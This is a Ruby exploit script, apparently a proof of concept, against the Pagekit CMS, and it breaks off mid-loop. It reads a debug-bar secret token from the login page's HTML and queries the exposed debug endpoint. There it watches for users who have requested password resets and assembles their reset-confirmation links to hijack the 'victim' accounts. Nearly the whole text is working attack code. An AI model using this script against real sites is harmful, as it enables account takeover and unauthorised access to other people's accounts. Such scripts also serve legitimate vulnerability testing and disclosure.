require 'net/http' #Enter the domain/IP address of the site for which you want to test this vulnerability vulnerableSite = 'http://127.0.0.1' loopCount = 0 while loopCount == 0 #We request the Login page which has the debug parameter url = URI.parse(vulnerableSite + '/pagekit/index.php/user/login') request = Net::HTTP::Get.new(url.to_s) resp = Net::HTTP.start(url.host, url.port) {|http| http.request(request) } #The response is received and is sent to many regular expression to find the value of _debug parameter from its HTML source code bodyOfResponse = resp.body myArray1 = bodyOfResponse.split(/"current":"/) outputOfMyArray1 = myArray1[1] myArray2 = outputOfMyArray1.split(/"};/) theSecret = myArray2[0] puts "" puts "The secret token to debug link is: #{theSecret}" puts "" url = URI.parse(vulnerableSite + '/pagekit/index.php/_debugbar/' + theSecret) request = Net::HTTP::Get.new(url.to_s) resp = Net::HTTP.start(url.host, url.port) {|http| http.request(request) } resp.body initial = resp.body #The count of number of victim users is found out users = initial.scan(/user=.+?(?=")/) c = users.count e = c.to_i #If the count is 0 then we continuosly monitor it if c == 0 then puts "Currently no user has clicked on reset password like." puts "" puts "Trying again..." puts "" puts "" #If the count is greater than 0 then it means we found a victim. So, find the password reset link and display it in the console else link1 = vulnerableSite + "/pagekit/index.php/user/resetpassword/confirm?user=" link2 = "&key=" i = 0 while i